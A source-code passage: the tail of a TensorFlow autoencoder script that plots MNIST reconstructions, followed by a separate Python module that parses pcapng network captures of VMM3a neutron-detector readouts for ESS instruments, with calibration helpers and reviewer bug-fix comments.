    X * tf.log(reconstruction + 1e-9) + (1 - X) * tf.log(1 - reconstruction + 1e-9),
    reduction_indices=1)
KL_tern = -.5 * tf.reduce_sum(
    1 + 2 * logstd - tf.pow(mu, 2) - tf.exp(2 * logstd),
    reduction_indices=1)
variational_lower_bound = tf.reduce_mean(log_likelihood - KL_tern)
optimizer = tf.train.AdadeltaOptimizer().minimize(-variational_lower_bound)

saver = tf.train.Saver()
init = tf.global_variables_initializer()
sess = tf.InteractiveSession()
sess.run(init)

# BUG FIX: the checkpoint was restored unconditionally AND then again behind
# a `load_model = False` flag, making the flag dead code. The restore now
# happens exactly once, controlled by the flag (default True preserves the
# original net effect of one restore).
load_model = True
if load_model:
    saver.restore(sess, os.path.join(model_dir, "autoencoder_model.ckpt"))

# Show num_pair (original, reconstruction) image pairs from the test set.
num_pair = 10
image_indices = np.random.randint(0, 200, num_pair)
for pair in range(num_pair):
    x = np.reshape(mnist.test.images[image_indices[pair]], (1, n_pixels))
    plt.figure()
    x_image = np.reshape(x, (28, 28))
    plt.subplot(121)
    plt.imshow(x_image)
    x_reconstruction = reconstruction.eval(feed_dict={X: x})
    x_reconstruction_image = (np.reshape(x_reconstruction, (28, 28)))
    plt.subplot(122)
    plt.imshow(x_reconstruction_image)
    # NOTE(review): indentation was lost in the source dump; show() is placed
    # inside the loop (one window per pair, matching plt.figure() per pair).
    plt.show()
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
###############################################################################
###############################################################################
######## V1.4 2021/08/25 francescopiscitelli ######################
######## script to read the pcapng file from VMM readout
###############################################################################
###############################################################################
# import argparse
import numpy as np
import pcapng as pg
import os
import time
import sys
# from lib import libPlotting as plo
###############################################################################
###############################################################################
class readouts():
    """Parallel-array container for VMM3A readout records.

    Each per-readout quantity is a 1-D numpy int64 array; all arrays share
    the same length and ordering.  'Durations' is a per-file quantity and is
    therefore excluded from sorting and calibration filtering.
    """

    # Identity/payload columns, initialized to -1 ("not set").
    _ID_FIELDS = ('Ring', 'Fen', 'VMM', 'hybrid', 'ASIC', 'Channel', 'ADC',
                  'BC', 'OTh', 'TDC', 'GEO', 'G0')
    # Timing columns, initialized to 0.
    _TIME_FIELDS = ('timeStamp', 'timeCoarse', 'PulseT', 'PrevPT')
    # Column layout of the 2-D array accepted by transformInReadouts.
    _DATA_COLUMNS = ('Ring', 'Fen', 'VMM', 'hybrid', 'ASIC', 'Channel', 'ADC',
                     'BC', 'OTh', 'TDC', 'GEO', 'timeCoarse', 'PulseT',
                     'PrevPT', 'G0')

    def __init__(self):
        datype = 'int64'
        for field in self._ID_FIELDS:
            setattr(self, field, -1 * np.ones((0), dtype=datype))
        for field in self._TIME_FIELDS:
            setattr(self, field, np.zeros((0), dtype=datype))
        self.Durations = np.zeros((0), dtype=datype)

    def transformInReadouts(self, data):
        """Load the columns of *data* (one row per readout) into the parallel arrays."""
        for col, field in enumerate(self._DATA_COLUMNS):
            setattr(self, field, data[:, col])

    def append(self, reado):
        """Concatenate another readouts object onto this one, column by column."""
        for field in self._ID_FIELDS + self._TIME_FIELDS:
            merged = np.concatenate((getattr(self, field), getattr(reado, field)), axis=0)
            setattr(self, field, merged)
        self.Durations = np.append(self.Durations, reado.Durations)

    def concatenateReadoutsInArrayForDebug(self):
        """Return an (N, 12) int64 array with a fixed debug column layout."""
        debug_columns = ('Ring', 'Fen', 'hybrid', 'ASIC', 'Channel', 'ADC',
                         'PulseT', 'PrevPT', 'timeStamp', 'timeCoarse',
                         'TDC', 'G0')
        leng = len(self.timeStamp)
        readoutsArray = np.zeros((leng, 12), dtype='int64')
        for col, field in enumerate(debug_columns):
            readoutsArray[:, col] = getattr(self, field)
        return readoutsArray

    def sortByTimeStamps(self):
        """Sort every column by ascending timeStamp (Durations untouched)."""
        indexes = self.timeStamp.argsort(kind='quicksort')
        for field in self._ID_FIELDS + self._TIME_FIELDS:
            setattr(self, field, getattr(self, field)[indexes])

    def calculateDuration(self):
        """Duration = last timestamp - first timestamp; 0 (with a warning) for empty data."""
        try:
            Tstart = self.timeStamp[0]
            Tstop = self.timeStamp[-1]
        # BUG FIX: was a bare `except:` — only an empty array (IndexError)
        # is expected here; anything else should propagate.
        except IndexError:
            Tstart = 0
            Tstop = 0
            print('\t \033[1;33mWARNING: Not able to calculate duration! (File might be empty)\033[1;37m')
            time.sleep(2)
        self.Durations = np.round(Tstop - Tstart, decimals=3)

    def calculateTimeStampWithTDC(self, NSperClockTick, time_offset=0, time_slope=1):
        """Fine timestamp = coarse time + calibrated TDC correction in ns."""
        # NOTE(review): VMM3A_convertCalibrate_TDC_ns is defined elsewhere in this module.
        self.timeStamp = self.timeCoarse + VMM3A_convertCalibrate_TDC_ns(self.TDC, NSperClockTick, time_offset, time_slope).TDC_ns

    def checkIfCalibrationMode(self):
        """Return True (and warn) if any readout carries the G0 latency-calibration flag."""
        flag = False
        if np.any(self.G0 == 1):
            flag = True
            print('\n\t\033[1;33mWARNING: calibration latency mode found in READOUTS.\033[1;37m', end='')
            time.sleep(1)
        return flag

    def removeCalibrationData(self):
        """Drop every readout flagged (G0 == 1) as latency-calibration data."""
        print('--> removing latency calib data from readouts ...')
        noCalibData = self.G0 == 0
        for field in self._ID_FIELDS + self._TIME_FIELDS:
            setattr(self, field, getattr(self, field)[noCalibData])
###############################################################################
###############################################################################
class checkInstrumentID():
    """Identify the instrument from its data-stream ID and report it on stdout."""

    def __init__(self, ID):
        self.FREIAID = 72
        self.EstiaID = 76
        self.AMORID = 78
        self.printa = True
        known_streams = {
            self.FREIAID: 'found Freia data stream',
            self.EstiaID: 'found Estia data stream',
            self.AMORID: 'found AMOR data stream',
        }
        message = known_streams.get(ID)
        if message is not None:
            print(message)
        else:
            # Unknown instrument: announce it and suppress later printing.
            print('found some other data stream')
            print('loading ... [0%]', end=' ')
            self.printa = False
#################################################
class checkWhich_RingFenHybrid_InFile():
    """Scan a pcapng file and report every (Ring, Fen, Hybrid) triple present."""

    def __init__(self, filePathAndFileName, NSperClockTick):
        """Parse the file and keep only its readouts (no timestamp sorting).

        NOTE(review): pcapng_reader is defined elsewhere in this module.
        """
        # Coarse time resolution is enough — only unique IDs matter here.
        pcap = pcapng_reader(filePathAndFileName, NSperClockTick, timeResolutionType = 'coarse', sortByTimeStampsONOFF = False)
        self.readouts = pcap.readouts
        temp = os.path.split(filePathAndFileName)
        # filePath = temp[0]+'/'
        self.fileName = temp[1]

    def check(self):
        """Print every unique Ring/Fen/Hybrid combination found in the readouts."""
        print("\nRings, Fens and Hybrids in file: {}".format(self.fileName))
        RingsInFile = np.unique(self.readouts.Ring)
        cont = 0  # running counter across all printed combinations
        for RR in RingsInFile:
            # self.RFH['Ring'] = RR
            selectRING = self.readouts.Ring == RR
            Fens4Ring = self.readouts.Fen[selectRING]
            Hybrids4Ring = self.readouts.hybrid[selectRING]
            FensInRing = np.unique(Fens4Ring)
            for FF in FensInRing:
                selectFEN = Fens4Ring == FF
                Hybrids4Fen = Hybrids4Ring[selectFEN]
                HybridsInFen = np.unique(Hybrids4Fen)
                for HH in HybridsInFen:
                    cont += 1
                    print("\tNo. {}: Ring {}, Fen {}, Hybrid {}".format(cont,int(RR),int(FF),int(HH)))
#################################################
class VMM3A():
    """Decode one 20-byte VMM3a readout record (little-endian fields).

    Fixed layout: byte 0 physical ring, 1 FEN, 2-3 length, 4-7 time high
    (seconds), 8-11 time low (clock ticks), 12-13 BC, 14-15 OTh/ADC,
    16 G0/GEO, 17 TDC, 18 VMM, 19 channel.
    """
    def __init__(self, buffer, NSperClockTick):
        littleInt = lambda chunk: int.from_bytes(chunk, byteorder='little')
        PhysicalRing = littleInt(buffer[0:1])
        self.Fen      = littleInt(buffer[1:2])
        self.Length   = littleInt(buffer[2:4])
        timeHI        = littleInt(buffer[4:8])
        timeLO        = littleInt(buffer[8:12])
        self.BC       = littleInt(buffer[12:14])
        OTADC         = littleInt(buffer[14:16])
        G0GEO         = littleInt(buffer[16:17])
        self.TDC      = littleInt(buffer[17:18])
        self.VMM      = littleInt(buffer[18:19])
        self.Channel  = littleInt(buffer[19:20])
        # two physical rings map to one logical ring (always 12 logical rings)
        self.Ring = int(np.floor(PhysicalRing/2))
        # bit-field unpacking
        self.ADC = OTADC & 0x3FF        # 10 LSBs: ADC value
        self.OTh = OTADC >> 15          # MSB: over-threshold flag
        self.G0 = G0GEO >> 7            # MSB: calibration-latency flag
        self.GEO = G0GEO & 0x3F         # 6 LSBs: GEO
        self.ASIC = self.VMM & 0x1      # LSB of VMM id
        self.hybrid = (self.VMM & 0xE) >> 1  # bits 1-3 of VMM id
        # coarse timestamp in ns: round each part BEFORE summing so the
        # integer ns sum stays exact
        timeHIns = int(round(timeHI * 1000000000))
        timeLOns = int(round(timeLO * NSperClockTick))
        self.timeCoarse = timeHIns + timeLOns
class VMM3A_convertCalibrate_TDC_ns():
    """Convert raw TDC values (0-255) into a calibrated time correction in ns.

    Corrected_time = (1.5*clockPeriod*2 - TDC*60ns/255 - time_offset) * time_slope
    Result is rounded and stored as int64 in ``self.TDC_ns``.

    time_offset is in ns, time_slope is adimensional.
    """
    def __init__(self,TDC,NSperClockTick,time_offset=0,time_slope=1):
        self.pTAC = 60  # TAC ramp length in ns
        # Clamp to the valid 8-bit range on BOTH sides. The previous
        # if/elif applied only one of the two clamps per call (the lower
        # clamp was skipped whenever any value exceeded 255), and it
        # mutated the caller's array in place; np.clip fixes both.
        TDCclamped = np.clip(TDC, 0, 255)
        TDC_ns = np.around( ( (NSperClockTick*2*1.5 - TDCclamped*self.pTAC/255 - time_offset) * time_slope ) )
        self.TDC_ns = TDC_ns.astype('int64')
class VMM3A_calibrate_ADC():
    """Apply offset/slope calibration to ADC values and clamp to the 10-bit range.

    calibrated = round((ADC - ADC_offset) * ADC_slope), clipped to [0, 1023],
    stored as int64 in ``self.ADC_calibrated``.
    """
    def __init__(self,ADC,ADC_offset=0,ADC_slope=1):
        ADC_calibrated = np.around(( ADC - ADC_offset ) * ADC_slope)
        # Clamp BOTH ends of the valid 10-bit range. The previous if/elif
        # skipped the lower clamp whenever any value exceeded 1023.
        ADC_calibrated = np.clip(ADC_calibrated, 0, 1023)
        self.ADC_calibrated = ADC_calibrated.astype('int64')
###############################################################################
###############################################################################
class checkIfFileExistInFolder():
    """Abort the whole program with a red error banner when the given file is missing."""
    def __init__(self, filePathAndFileName):
        if os.path.exists(filePathAndFileName):
            return
        folder, name = os.path.split(filePathAndFileName)
        filePath = folder+'/'
        print('\n \033[1;31m---> File: '+name+' DOES NOT EXIST \033[1;37m')
        print('\n ---> in folder: '+filePath+' \n')
        print(' ---> Exiting ... \n')
        print('------------------------------------------------------------- \n')
        sys.exit()
##################################################
class pcapng_reader():
    """Load VMM3a readouts from a pcapng file via the pre-allocation reader.

    On success ``self.readouts`` holds the decoded data, optionally sorted by
    timestamp; on any loading failure the process exits.
    """
    def __init__(self, filePathAndFileName, NSperClockTick, timeResolutionType = 'fine', sortByTimeStampsONOFF = True):
        self.readouts = readouts()
        try:
            # print('PRE-ALLOC method to load data ...')
            self.pcapng = pcapng_reader_PreAlloc(filePathAndFileName,NSperClockTick,timeResolutionType)
            self.pcapng.allocateMemory()
            self.pcapng.read()
            self.readouts = self.pcapng.readouts
        except Exception:
            # NOTE: was a bare `except:`, which also swallowed SystemExit
            # (raised by the missing-file check) and KeyboardInterrupt.
            print('\n... PRE-ALLOC method failed, exiting ...')
            sys.exit()
        # post-processing only runs on success; previously this sat in a
        # `finally` clause and so also ran on empty readouts after a failure
        if sortByTimeStampsONOFF is True:
            print('Readouts are sorted by TimeStamp')
            self.readouts.sortByTimeStamps()
        else:
            print('Readouts are NOT sorted by TimeStamp')
        self.readouts.calculateDuration()
##################################################
class pcapng_reader_PreAlloc():
    """Two-pass pcapng loader for ESS/VMM3a data.

    Pass 1 (``allocateMemory``) scans the per-packet sizes to pre-allocate the
    readout array; pass 2 (``read``) decodes every 20-byte readout into
    ``self.readouts``. Avoids per-readout appends for speed.
    """
    def __init__(self, filePathAndFileName, NSperClockTick, timeResolutionType = 'fine'):
        # number of decimals after comma in seconds, to round the PulseT and PRevPT: 6 means 1us rounding, etc...
        # self.resolution = 9
        # self.timeResolution = 11.25e-9 #s per tick for 88.888888 MHz
        # self.timeResolution = 11.356860963629653e-9 #s per tick ESS for 88.0525 MHz
        self.NSperClockTick = NSperClockTick
        self.timeResolutionType = timeResolutionType
        self.filePathAndFileName = filePathAndFileName
        # exits the whole program if the file is missing
        checkIfFileExistInFolder(self.filePathAndFileName)
        temp2 = os.path.split(filePathAndFileName)
        fileName = temp2[1]
        self.fileSize = os.path.getsize(self.filePathAndFileName) #bytes
        print('{} is {} kbytes'.format(fileName,self.fileSize/1000))
        self.readouts = readouts()
        #############################
        self.debug = False
        # packet geometry constants
        self.offset = 25 #bytes Num of bytes after the word (cookie) ESS = 0x 45 53 53
        self.mainHeaderSize = 42 #bytes (14 bytes of Ethernet header, 20 bytes of IPv4 header, and 8 bytes of UDP header)
        self.ESSheaderSize = 30 #bytes
        self.headerSize = self.mainHeaderSize+self.ESSheaderSize #bytes (72 bytes)
        self.singleReadoutSize = 20 #bytes
        # self.numOfPacketsPerTransfer = 447
        # self.expectedESSpacketSize = 72+NumOfReadoutsIN1PAcket*20 = max 9000bytes
        # self.preallocLength = round(self.fileSize*1.2/self.expectedESSpacketSize)*self.numOfPacketsPerTransfer
        #############################
        # bookkeeping counters filled by allocateMemory()/read()
        self.counterPackets = 0
        self.counterCandidatePackets = 0
        self.counterValidESSpackets = 0
        self.counterNonESSpackets = 0
        self.counterEmptyESSpackets = 0
        self.totalReadoutCount = 0
    # def __del__(self):
    #     try:
    #         self.ff.close()
    #     except:
    #         pass
    def dprint(self, msg):
        """Print msg only when self.debug is True."""
        if self.debug:
            print("{}".format(msg))
    def allocateMemory(self):
        """First pass: record per-packet sizes and derive self.preallocLength."""
        ff = open(self.filePathAndFileName, 'rb')
        scanner = pg.FileScanner(ff)
        packetsSizes = np.zeros((0),dtype='int64')
        for block in scanner:
            self.counterPackets += 1
            self.dprint("packet {}".format(self.counterPackets))
            try:
                packetSize = block.packet_len
                self.dprint("packetSize {} bytes".format(packetSize))
            except:
                # pcapng blocks without packet_len (section headers etc.)
                self.dprint('--> other packet found No. {}'.format(self.counterPackets-self.counterCandidatePackets))
            else:
                self.counterCandidatePackets += 1
                packetsSizes = np.append(packetsSizes,packetSize)
        self.dprint('counterPackets {}, counterCandidatePackets {}'.format(self.counterPackets,self.counterCandidatePackets))
        if self.debug:
            overallSize = np.sum(packetsSizes)
            self.dprint('overallSize {} bytes'.format(overallSize))
        numOfReadoutsInPackets = (packetsSizes - self.headerSize)/self.singleReadoutSize #in principle this is 447 for every packet
        # if negative there was a non ESS packet so length < 72 bytes,
        # and if much bigger we anyhow allocate more than needed and
        # remove zeros afterwards at the end
        numOfReadoutsTotal = np.sum(numOfReadoutsInPackets[ numOfReadoutsInPackets >= 0])
        self.preallocLength = round(numOfReadoutsTotal)
        self.dprint('preallocLength {}'.format(self.preallocLength))
        ff.close()
    def read(self):
        """Second pass: decode every readout into self.data, then build self.readouts.

        Column layout of self.data: 0 Ring, 1 Fen, 2 VMM, 3 hybrid, 4 ASIC,
        5 Channel, 6 ADC, 7 BC, 8 OTh, 9 TDC, 10 GEO, 11 timeCoarse,
        12 PulseT, 13 PrevPT, 14 G0 (1 = calibration).
        """
        self.data = np.zeros((self.preallocLength,15), dtype='int64')
        ff = open(self.filePathAndFileName, 'rb')
        scanner = pg.FileScanner(ff)
        overallDataIndex = 0
        stepsForProgress = int(self.counterCandidatePackets/4)+1 # 4 means 25%, 50%, 75% and 100%
        for block in scanner:
            try:
                packetLength = block.packet_len
                packetData = block.packet_data
            except:
                self.dprint('--> other packet found')
            else:
                indexESS = packetData.find(b'ESS')
                self.dprint('index where ESS word starts {}'.format(indexESS))
                # it should be always 44 = 42+2
                if indexESS == -1:
                    # this happens if it not an ESS packet
                    self.counterNonESSpackets += 1
                else:
                    # there is an ESS packet but i can still be empty, i.e. 72 bytes only
                    self.counterValidESSpackets += 1
                    if self.counterValidESSpackets == 1:
                        # announce the instrument once, from the ID byte after the cookie
                        checkInstrumentID(packetData[indexESS+3])
                    indexDataStart = indexESS + self.offset + 3 # this is 72 = 44+25+3
                    # give a warning if not 72, check that ESS cookie is always in the same place
                    if indexDataStart != self.headerSize:
                        print('\n \033[1;31mWARNING ---> ESS cookie is not in position 72! \033[1;37m')
                    ESSlength = int.from_bytes(packetData[indexESS+4:indexESS+6], byteorder='little') # bytes
                    # pulse-time and previous-pulse-time, each split into a
                    # seconds-counter (high) and a clock-tick counter (low)
                    PulseThigh = int.from_bytes(packetData[indexESS+8:indexESS+12], byteorder='little')*1000000000
                    PulseTlow = int.from_bytes(packetData[indexESS+12:indexESS+16], byteorder='little')*self.NSperClockTick
                    PrevPThigh = int.from_bytes(packetData[indexESS+16:indexESS+20], byteorder='little')*1000000000
                    PrevPTlow = int.from_bytes(packetData[indexESS+20:indexESS+24], byteorder='little')*self.NSperClockTick
                    # IMPORTANT if you do int round after sum is off, needs to be done before then sum hi and low
                    PulseThighR = int(round(PulseThigh))
                    PulseTlowR = int(round(PulseTlow))
                    PrevPThighR = int(round(PrevPThigh))
                    PrevPTlowR = int(round(PrevPTlow))
                    PulseT = PulseThighR + PulseTlowR
                    PrevPT = PrevPThighR + PrevPTlowR
                    readoutsInPacket = (packetLength - indexDataStart) / self.singleReadoutSize
                    # or alternatively
                    # readoutsInPacket = (ESSlength - self.ESSheaderSize) / self.singleReadoutSize
                    # ESSlength is only 30 if the packet is an ESS packet but empty= 72-42 =30
                    self.dprint('ESS packet length {} bytes, packetLength {} bytes, readouts in packet {}'.format(ESSlength, packetLength,readoutsInPacket))
                    if (packetLength - indexDataStart) == 0:
                        self.counterEmptyESSpackets += 1
                        self.dprint('empty packet No. {}'.format(self.counterEmptyESSpackets))
                    else:
                        if readoutsInPacket.is_integer() is not True:
                            # payload is not a whole number of 20-byte readouts
                            print('\n \033[1;31mWARNING ---> something wrong with data bytes dimensions \033[1;37m')
                            break
                        else:
                            readoutsInPacket = int(readoutsInPacket)
                            self.totalReadoutCount += readoutsInPacket
                            for currentReadout in range(readoutsInPacket):
                                overallDataIndex += 1
                                indexStart = indexDataStart + self.singleReadoutSize * currentReadout
                                indexStop = indexDataStart + self.singleReadoutSize * (currentReadout + 1)
                                vmm3 = VMM3A(packetData[indexStart:indexStop], self.NSperClockTick)
                                index = overallDataIndex-1
                                self.data[index, 0] = vmm3.Ring
                                self.data[index, 1] = vmm3.Fen
                                self.data[index, 2] = vmm3.VMM
                                self.data[index, 3] = vmm3.hybrid
                                self.data[index, 4] = vmm3.ASIC
                                self.data[index, 5] = vmm3.Channel
                                self.data[index, 6] = vmm3.ADC
                                self.data[index, 7] = vmm3.BC
                                self.data[index, 8] = vmm3.OTh
                                self.data[index, 9] = vmm3.TDC
                                self.data[index, 10] = vmm3.GEO
                                self.data[index, 11] = vmm3.timeCoarse
                                self.data[index, 12] = PulseT
                                self.data[index, 13] = PrevPT
                                self.data[index, 14] = vmm3.G0 # if 1 is calibration
                                # self.data[index, 7] = vmm3.timeStamp
                                self.dprint(" \t Packet: {} ({} bytes), Readout: {}, Ring {}, FEN {}, VMM {}, hybrid {}, ASIC {}, Ch {}, Time Coarse {} ns, BC {}, OverTh {}, ADC {}, TDC {}, GEO {} " \
                                .format(self.counterValidESSpackets,ESSlength,currentReadout+1,vmm3.Ring,vmm3.Fen,vmm3.VMM,vmm3.hybrid,vmm3.ASIC,vmm3.Channel,vmm3.timeCoarse,vmm3.BC,vmm3.OTh,vmm3.ADC,vmm3.TDC,vmm3.GEO))
                    ###########
                    # progress printout every ~25% of the candidate packets
                    # NOTE(review): both sides of this `or` are identical — likely
                    # a leftover from a second condition that was removed
                    if np.mod(self.counterValidESSpackets,stepsForProgress) == 0 or np.mod(self.counterValidESSpackets,stepsForProgress) == 0:
                        percents = int(round(100.0 * self.counterValidESSpackets / float(self.counterCandidatePackets), 1))
                        print('['+format(percents,'01d') + '%]',end=' ')
        print('[100%]',end=' ')
        self.dprint('\n All Packets {}, Candidates for Data {} --> Valid ESS {} (empty {}), NonESS {} '.format(self.counterPackets , self.counterCandidatePackets,self.counterValidESSpackets ,self.counterEmptyESSpackets,self.counterNonESSpackets))
        #######################################################
        # here I remove the rows that have been preallocated but no filled in case there were some packets big but no ESS
        if self.preallocLength > self.totalReadoutCount:
            datanew = np.delete(self.data,np.arange(self.totalReadoutCount,self.preallocLength),axis=0)
            print('removing extra allocated length not used ...')
        elif self.preallocLength < self.totalReadoutCount:
            # should never happen: more readouts decoded than pre-allocated
            print('something wrong with the preallocation: allocated length {}, total readouts {}'.format(self.preallocLength,self.totalReadoutCount))
            sys.exit()
        elif self.preallocLength == self.totalReadoutCount:
            datanew = self.data
        # drop any all-zero rows left over from over-allocation
        cz = checkIfDataHasZeros(datanew)
        datanew = cz.dataOUT
        self.readouts.transformInReadouts(datanew)
        # self.readouts.calculateTimeStamp(self.NSperClockTick)
        # 'fine' adds the per-readout TDC correction; 'coarse' uses the raw coarse time
        if self.timeResolutionType == 'fine':
            self.readouts.calculateTimeStampWithTDC(self.NSperClockTick)
        elif self.timeResolutionType == 'coarse':
            self.readouts.timeStamp = self.readouts.timeCoarse
        flag = self.readouts.checkIfCalibrationMode()
        if flag is True:
            self.readouts.removeCalibrationData()
        # self.readouts.timeStamp = self.readouts.timeCoarse + VMM3A_convertCalibrate_TDCinSec(self.readouts.TDC,timeResolution,time_offset=100e-9,time_slope=1).TDC_s
        # self.readouts.TDC = VMM3A_convertCalibrate_TDCinSec(self.readouts.TDC,timeResolution,time_offset=100e-9,time_slope=1).TDC_s
        print('\ndata loaded - found {} readouts - Packets: all {} (candidates {}) --> valid ESS {} (of which empty {}), nonESS {})'.format(self.totalReadoutCount, self.counterPackets,self.counterCandidatePackets,self.counterValidESSpackets ,self.counterEmptyESSpackets,self.counterNonESSpackets))
        # print('\n')
        ff.close()
class checkIfDataHasZeros():
    """Strip rows whose sum is not positive (pre-allocated, never-filled rows).

    ``flag`` is True when at least one row was removed; the filtered array is
    in ``dataOUT``.
    """
    def __init__(self, data):
        self.dataIN = data
        self.OriginalLength = np.shape(self.dataIN)[0]
        keepRows = np.argwhere(np.sum(data, axis=1) > 0)[:, 0]
        self.dataOUT = self.dataIN[keepRows, :]
        self.NewLength = np.shape(self.dataOUT)[0]
        self.flag = self.NewLength != self.OriginalLength
        if self.flag:
            print('---> removing zeros left in in data')
###############################################################################
###############################################################################
# NOTE THIS PART BELOW IS WITH APPEND METHOD IS SLOW BUT IT MIGHT BE NEEDED FOR SPECIAL CASES, IT NEEDS A FIX FOR THE FUTURE
# class pcapng_reader_slowAppend():
# def __init__(self, filePathAndFileName):
# if os.path.exists(filePathAndFileName) is False:
# temp2 = os.path.split(filePathAndFileName)
# filePath = temp2[0]+'/'
# fileName = [temp2[1]]
# print('\n \033[1;31m---> File: '+fileName+' DOES NOT EXIST \033[1;37m')
# print('\n ---> in folder: '+filePath+' \n')
# print(' ---> Exiting ... \n')
# print('------------------------------------------------------------- \n')
# sys.exit()
# self.ff = open(filePathAndFileName, 'rb')
# self.readouts = readouts()
# self.fileSize = os.path.getsize(filePathAndFileName) #bytes
# print('data is {} kbytes'.format(self.fileSize/1e3))
# self.debug = False
# self.offset = 25 #bytes Num of bytes after the word (cookie) ESS = 0x 45 53 53
# self.ESSheaderSize = 30 #bytes
# self.dataPacketLength = 20 #bytes
# # self.timeResolution = 11.25e-9 #s per tick
# self.timeResolution = 11.35686096362965e-9 #s per tick ESS
# self.numOfPacketsPerTransfer = 400
# # self.numOfPacketsPerTransfer = 447
# self.expectedESSpacketSize = self.numOfPacketsPerTransfer*self.dataPacketLength+self.ESSheaderSize #8970 bytes
# self.preallocLength = round(self.fileSize*1.2/self.expectedESSpacketSize)*self.numOfPacketsPerTransfer
# # I add a 20% *1.2 for safety
# self.packetCount = 0
# self.truePacketCount = 0
# self.nonESSPacketCount = 0
# self.totalReadoutCount = 0
# def __del__(self):
# try:
# self.ff.close()
# except:
# pass
# def dprint(self, msg):
# if self.debug:
# print("{}".format(msg))
# def read(self, timeResolutionType='fine'):
# self.timeResolutionType = timeResolutionType
# scanner = pg.FileScanner(self.ff)
# data = np.zeros((0,12), dtype='float64')
# for block in scanner:
# self.packetCount += 1
# readoutCount = 0
# try:
# packetLength = block.packet_len
# packetData = block.packet_data
# except:
# continue
# self.truePacketCount += 1
# self.dprint("packet {} - length {}".format(self.packetCount, packetLength))
# indexESS = packetData.find(b'ESS')
# if indexESS == -1:
# self.nonESSPacketCount += 1
# continue
# if self.truePacketCount == 1:
# checkInstrumentID(packetData[indexESS+3])
# indexDataStart = indexESS + 2 + self.offset + 1
# ESSlength = int.from_bytes(packetData[indexESS+4:indexESS+6], byteorder='little') # bytes
# # check that ESS is always in the same place
# # tempIndexDataStart.append(indexDataStart)
# readoutCount = (packetLength - indexDataStart) / self.dataPacketLength
# self.dprint("readoutCount {}".format(readoutCount))
# if readoutCount.is_integer() is not True:
# print('something wrong with data bytes dimensions')
# break
# else:
# readoutCount = int(readoutCount)
# self.totalReadoutCount += readoutCount
# for currentReadout in range(readoutCount):
# indexStart = indexDataStart + self.dataPacketLength * currentReadout
# indexStop = indexDataStart + self.dataPacketLength * (currentReadout + 1)
# vmm3 = VMM3A(packetData[indexStart:indexStop], self.timeResolution, self.timeResolutionType)
# # self.data.append(vmm3)
# # NOTE this append at every cycle is not efficient for speed so better to allocate the array and fill it, then append outside inner loop
# index = (self.truePacketCount-1)*self.numOfPacketsPerTransfer+currentReadout
# # print(vmm3.Channel)
# # vmm3.Ring
# temp = np.array([vmm3.Ring,vmm3.Fen,vmm3.VMM,vmm3.hybrid,vmm3.ASIC,vmm3.Channel,vmm3.ADC,vmm3.timeStamp,vmm3.BC,vmm3.OTh,vmm3.TDC,vmm3.GEO])
# data = np.concatenate((data,temp[None,:]),axis=0)
# del temp
# # data[index, 1] = vmm3.Fen
# # data[index, 2] = vmm3.VMM
# # data[index, 3] = vmm3.hybrid
# # data[index, 4] = vmm3.ASIC
# # data[index, 5] = vmm3.Channel
# # data[index, 6] = vmm3.ADC
# # data[index, 7] = vmm3.timeStamp
# # data[index, 8] = vmm3.BC
# # data[index, 9] = vmm3.OTh
# # data[index, 10] = vmm3.TDC
# # data[index, 11] = vmm3.GEO
# self.dprint(" \t Packet: {} ({} bytes), Readout: {}, Ring {}, FEN {}, VMM {}, hybrid {}, ASIC {}, Ch {}, Time {} s, BC {}, OverTh {}, ADC {}, TDC {}, GEO {} " \
# .format(self.truePacketCount,ESSlength,currentReadout+1,vmm3.Ring,vmm3.Fen,vmm3.VMM,vmm3.hybrid,vmm3.ASIC,vmm3.Channel,vmm3.timeStamp,vmm3.BC,vmm3.OTh,vmm3.ADC,vmm3.TDC,vmm3.GEO))
# ###########
# # check
# packetLength = readoutCount*self.dataPacketLength + self.ESSheaderSize # bytes
# if packetLength != ESSlength and self.truePacketCount == 1:
# print('something wrong with this packet: exp size {} bytes, found {} bytes.'.format(ESSlength,packetLength))
# roughNumOfPackets = round(self.fileSize/ESSlength)
# steps = int(roughNumOfPackets/4)+1
# if np.mod(self.truePacketCount,steps) == 0 or np.mod(self.truePacketCount,steps) == 0:
# percents = int(round(100.0 * self.truePacketCount / float(roughNumOfPackets), 1))
# print('['+format(percents,'01d') + '%]',end=' ')
# print('[100%]',end=' ')
# # here I remove the rows that have been preallocated but no filled
# # datanew = np.delete(data,np.arange(self.totalReadoutCount,self.preallocLength),axis=0)
# self.readouts.transformInReadouts(data)
# # check
# if data.shape[0] != self.totalReadoutCount:
# print('\nsomething wrong ... mismatch between data exp. length {} and what was read {}'.format(self.totalReadoutCount,self.readouts.Ring.shape[0]))
# print('\ndata loaded - found {} readouts ({} kbytes) - Packets: valid {}, nonESS {}, All {})'.format(self.totalReadoutCount,self.truePacketCount*ESSlength/1e3,self.truePacketCount,self.nonESSPacketCount,self.packetCount))
# self.__del__()
# return data
###############################################################################
###############################################################################
if __name__ == '__main__':
    # ad-hoc manual test / profiling entry point for this module
    # parser = argparse.ArgumentParser()
    # parser.add_argument("-f", metavar='file', help = "pcap file",
    #                     type = str, default = "VMM3a_Freia.pcapng")
    # parser.add_argument('-d', action='store_true', help = "add debug print")
    tProfilingStart = time.time()  # wall-clock start for the timing report below
    # arg = parser.parse_args()
    # filePath = './'+"VMM3a.pcapng"
    # NOTE(review): hard-coded developer-machine path — adjust before running elsewhere
    path = '/Users/francescopiscitelli/Desktop/dataPcapUtgard/'
    # filePath = path+'pcap_for_fra.pcapng'
    # filePath = path+'pcap_for_fra_ch2test.pcapng'
    # filePath = path+'pcap_for_fra_ch2test_take2.pcapng'
    # filePath = path+'pcap_for_fra_coinc.pcapng'
    filePath = path+'freiatest.pcapng'
    # filePath = path+'20211005_091349_morten.pcapng'
    # path = '/Users/francescopiscitelli/Documents/PYTHON/MBUTYcap/data/'
    # filePath = path+'VMM3a_Freia.pcapng'
    # pr = pcapng_reader(filePath,timeResolutionType='fine')
    # # pr.debug = True
    # # pr.ret()
    # # data = pr.data
    #
    # pr = pcapng_reader_PreAlloc(filePath)
    # # pr.debug = True
    # pr.allocateMemory()
    # pr.read(timeResolutionType='fine')
    # pcap = pcapng_reader(filePath,timeResolutionType='fine', sortByTimeStampsONOFF = True)
    # readouts = pcap.readouts
    # readouts.sortByTimeStamps()
    # readoutsArray = readouts.concatenateReadoutsInArrayForDebug()
    #
    # ppp = plo.plottingReadouts(vmm3, config)
    # ppp.plotChRaw(parameters.cassettes.cassettes)
    # ppp.plotTimeStamps(parameters.cassettes.cassettes)
